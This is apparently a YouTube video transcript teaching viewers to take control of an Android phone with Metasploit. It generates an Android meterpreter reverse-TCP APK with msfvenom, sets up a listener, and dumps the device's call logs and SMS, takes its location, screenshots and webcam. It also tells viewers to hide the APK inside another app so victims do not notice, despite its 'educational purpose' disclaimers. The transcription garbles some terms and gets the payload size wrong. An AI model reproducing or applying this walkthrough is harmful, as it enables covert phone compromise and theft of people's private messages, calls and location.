Hello guys, welcome to my channel. So today we are going to see how we can control any Android device using Kali Linux. So let's get started. So first of all, you need to understand how the MetaSploit work. So today I'm going to teach you the same and let's see how it goes. So first of all, let me change my directory to my workspace. So here I am in my workspace, so you can see my system is little different, but still this is Kali Linux, the normal operating system. So now we are going to create an exploiter, so using Metasploit. So what you're going to do is you are just going to add the command, that is msf venom, and you can get all the list, like you can get the list of the payloads. So to get the list of payloads, you can just type the command msf venom l payload, and you're going to get a list of payloads that you can use to create the backdoors or in order to get access into the systems. So here is just loading, so it may take some time. So now we can see that all the payloads have been loaded. The payloads are used to create backdoors. So you can see that there are many payloads for Windows. You can get payloads for Linux. You can get payload for Android. So these are a list of payloads that are present here. You can see the payload of Ruby. So now we are going to use the payload of Android. So you can see a Linux as well, so you can just go through all the payloads which you like. So now we are going to use the command msf venom with parameter pay as payload, and the payload we are using is the Android meterpreter, and we are going to add the reverse TCP option. So now for this you need to get your localhost. So just open the another terminal and just type the command ifconfig to get your IP. So you can get your localhost IP over here. 192.168.1.35 is mine. You can check yours. So you need to specify here yellowhost, that is a localhost, that is 192.168.1.35 with the L port as 4444, and you need to know where you are creating, so that the workspace you have to specify your you can directly specify your directory where you want to create the payload, or else you can just give the value afterwards. So now we are going to create it. So this works for the Android. So if you want to create for Windows, then it's a different part, and I'm going to do a video on that as well. So now let us give the name as android.apk. So we just click enter. So our payload is getting ready. So you can see that over here android.apk has already been created. So let's wait for the full process to complete. So you can see that our payload has been created, and you can see that the payload size is 10,175 bytes, that is 10 MB. So what you need to do is you need to install it in the Android device which you want to hack, or which you want to control. So I'm going to shift it to my own mobile. So please don't do this, try this for the fun purpose. This is only for the educational purpose and not to try to harm anyone. So please be careful while using this stuff. You may end up in severe conditions. So now let me just add it to my Android device. Okay, so I've installed it in my Android device. So the best way to install this application is by using another application, so where you can build this application inside that, so that they won't get any doubt, and after installing the user will not know that an app has been installed, that is the android.apk has been installed, because it won't be shown in your home menu or anywhere else. So even you can hide it. So now let us work on further on how to get the information from the affected device. So now you need to type in the command msf console to get all the details of the affected Android device. So once the phone is set up and the application is being given the permission along with the other application that you have joined together, so your Metasploit is ready to exploit. So we are starting the Metasploit console over here. So now it's getting connected with your system. So now let's wait for a little time to get connected. And now we have got the MSF5. So now let's use the command use multi-handler, and you can see that the multi-handler will be open now. So you can see the exploit multi-handler is open. So now we need to set the payload. The payload we have set, we had created was the Android meterpreter, and it's reverse TCP. So now just set the payload. So you have set the payload as Android meterpreter reverse TCP, and now you need to set your localhost and the YEL port, local port that you have specified. So you need to set the local port again, localhost to again 192.168.1.35. So set host to 192.168.1.35 and set YEL port to 4444, and you're ready with your localhost and local port. And now let's begin the exploit. So just type exploit. So your reverse TCP has started, and you can get all the information. So you can see the meterpreter session, one session has been opened in the meterpreter, and if you don't know the commands that are specified or that can be used, you can just add a question tag and just enter. So you're going to get all the different types of attacks you can do on the system. So you can see the background BGKL, and there are many more like the webcam chat, webcam list. Even you can get the screen share, screenshot, and even you can get the call list, call them, and many more. And you can also request to install APK files. You can start any activity, and let's check some of them. Okay, so let's check whether what the system info. So you can see that the system info is Android 10, it's running Android 10, and you can see whether the system is rooted. So the system is not rooted. So even if you want, you can get the call logs. So let me just check the call log. So what you need to do is dump underscore call log and just click enter, and your call log has been saved by the name call log dump, and you can see over here, you can see the file. So I'm not going to open it because it contains my other details. So but you can get all the log details. So if you have deleted any call log or any call log or messages, you can get all the call logs and messages using this. So if you want to get the deleted messages or all the messages that are stored in your mobile, then you can just type the command dump SMS, and you're going to get all the SMS, and it's going to be saved in a file with the name created by it. So you can see that the file has been created with the SMS dump and with the same name. So these are all the different, even you can get the geolocation. So if now I can try to get the location. So now it's telling the operation failed because presently in my phone the location option is disabled. So let me open it right now, and now if I geolocate it, then I'm going to get the location. So you can get, or you can do all the other things. You can get the screenshot of the device, you can play any audio file on the target system, You can just send a message to itself and you can do much more things. But please don't use this for your evil purposes. Please, this video is only for the educational purpose. Thank you guys. Thank you for watching. If you like this video, then please do share this video and also like this video. And if you want more videos like this, then please do subscribe to this channel and also click on the bell button to receive the notifications of all the new videos from this channel. So I'll meet you in my next video. Thank you for watching.